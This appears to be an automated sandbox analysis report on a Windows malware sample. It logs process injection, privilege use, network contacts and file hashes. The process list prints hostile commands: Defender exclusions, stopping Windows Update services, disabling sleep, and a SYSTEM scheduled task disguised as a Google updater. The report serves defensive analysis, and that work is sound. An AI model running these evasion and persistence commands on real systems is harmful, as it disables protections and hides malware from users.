Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1536 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1536 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1536 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2876 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2876 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1536 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1536 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1536 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2216 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 4408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 4408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 2504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 2504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 3088 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 3088 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1352 wrote to memory of 3928 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 3928 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 1864 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 1864 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe

"C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1536 -ip 1536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 2620

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 126.155.241.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 126.136.241.8.in-addr.arpa udp

Files

memory/1536-134-0x00000000025D0000-0x00000000026D0000-memory.dmp

memory/1536-135-0x0000000002560000-0x000000000259F000-memory.dmp

memory/1536-136-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/1536-137-0x0000000006C00000-0x0000000006C10000-memory.dmp

memory/1536-138-0x0000000006C00000-0x0000000006C10000-memory.dmp

memory/1536-139-0x0000000006C10000-0x00000000071B4000-memory.dmp

memory/1536-140-0x00000000746C0000-0x0000000074E70000-memory.dmp

memory/1536-141-0x00000000071C0000-0x00000000077D8000-memory.dmp

memory/1536-142-0x00000000077E0000-0x00000000078EA000-memory.dmp

memory/1536-143-0x0000000007920000-0x0000000007932000-memory.dmp

memory/1536-145-0x0000000006C00000-0x0000000006C10000-memory.dmp

memory/1536-144-0x0000000007940000-0x000000000797C000-memory.dmp

memory/1536-146-0x00000000025D0000-0x00000000026D0000-memory.dmp

memory/1536-147-0x0000000002560000-0x000000000259F000-memory.dmp

memory/1536-148-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/1536-150-0x0000000007C40000-0x0000000007CB6000-memory.dmp

memory/1536-151-0x0000000007CC0000-0x0000000007D52000-memory.dmp

memory/1536-152-0x0000000007D60000-0x0000000007DC6000-memory.dmp

memory/1536-153-0x00000000746C0000-0x0000000074E70000-memory.dmp

memory/1536-154-0x00000000090A0000-0x0000000009262000-memory.dmp

memory/1536-155-0x000000000A8D0000-0x000000000ADFC000-memory.dmp

memory/1536-156-0x0000000006C00000-0x0000000006C10000-memory.dmp

memory/1536-157-0x00000000088C0000-0x0000000008910000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1252-181-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-183-0x00007FF8E48F0000-0x00007FF8E4AE5000-memory.dmp

memory/1252-182-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-185-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-186-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-187-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-188-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-189-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-190-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-192-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-193-0x00007FF8E48F0000-0x00007FF8E4AE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/4608-202-0x0000000000680000-0x000000000090B000-memory.dmp

memory/1680-203-0x000001FE55EF0000-0x000001FE55F12000-memory.dmp

memory/1680-204-0x00007FF8C5960000-0x00007FF8C6421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4o4jjo2n.jpm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1252-205-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1680-216-0x000001FE55E40000-0x000001FE55E50000-memory.dmp

memory/1680-215-0x000001FE55E40000-0x000001FE55E50000-memory.dmp

memory/1680-217-0x000001FE55E40000-0x000001FE55E50000-memory.dmp

memory/1680-221-0x00007FF8C5960000-0x00007FF8C6421000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1392-224-0x00007FF8C5A80000-0x00007FF8C6541000-memory.dmp

memory/1392-225-0x0000019CA9890000-0x0000019CA98A0000-memory.dmp

memory/4608-227-0x0000000000680000-0x000000000090B000-memory.dmp

memory/1392-226-0x0000019CA9890000-0x0000019CA98A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

memory/1392-238-0x0000019CA9890000-0x0000019CA98A0000-memory.dmp

memory/1392-239-0x0000019CA9890000-0x0000019CA98A0000-memory.dmp

memory/1392-241-0x00007FF8C5A80000-0x00007FF8C6541000-memory.dmp

memory/1252-243-0x00007FF7DF020000-0x00007FF7E0246000-memory.dmp

memory/1252-244-0x00007FF8E48F0000-0x00007FF8E4AE5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4672-246-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-247-0x00007FF8E48F0000-0x00007FF8E4AE5000-memory.dmp

memory/4672-248-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-249-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-250-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-251-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-252-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-253-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-255-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-256-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4672-258-0x00007FF8E48F0000-0x00007FF8E4AE5000-memory.dmp

memory/4776-259-0x00007FF8C5A80000-0x00007FF8C6541000-memory.dmp

memory/4776-260-0x000002B244C50000-0x000002B244C60000-memory.dmp

memory/4776-280-0x000002B25DA20000-0x000002B25DA3C000-memory.dmp

memory/4672-270-0x00007FF6C4EB0000-0x00007FF6C60D6000-memory.dmp

memory/4776-281-0x000002B25DB00000-0x000002B25DB0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 200f8b40e2162fb09bbc84f84f559502
SHA1 92fc86ec85056460a156b52e6777e3dfbd11ea45
SHA256 e7749b442e5d51e9afeaa58f232b57347a188b8f7ddae803925f2b272fd78254
SHA512 1fe94e44ebf6c6b34429cb97826c03d2ab2a965251a39c6d72782ab3c54e44b1c42c53e836649d3b4d97544d740d018b6b5a622a6d3d122a1df97930e9fe7c1d

memory/4776-287-0x000002B25DC70000-0x000002B25DC8C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 d26057c79507673cf54b20eb167af22d
SHA1 da69e0b12eafcda43e80ebf56ad1116c9f15850a
SHA256 c3896668867a6d214162f8bc0716a71fcbf99134d6dc733170f81c61a36c5db2
SHA512 c3c44a4ee24d927f9d0cb1b281379326742e8484b41070ec3adf448b0aa5c6a6953d0e7fbee271aae4ce2b2ed143aa38567b1226486e42863a8db143a0f50ff3

memory/3440-291-0x0000000000440000-0x0000000000A74000-memory.dmp

memory/3440-292-0x0000000077314000-0x0000000077316000-memory.dmp

memory/3440-293-0x0000000000440000-0x0000000000A74000-memory.dmp

memory/3440-294-0x0000000001580000-0x00000000015F0000-memory.dmp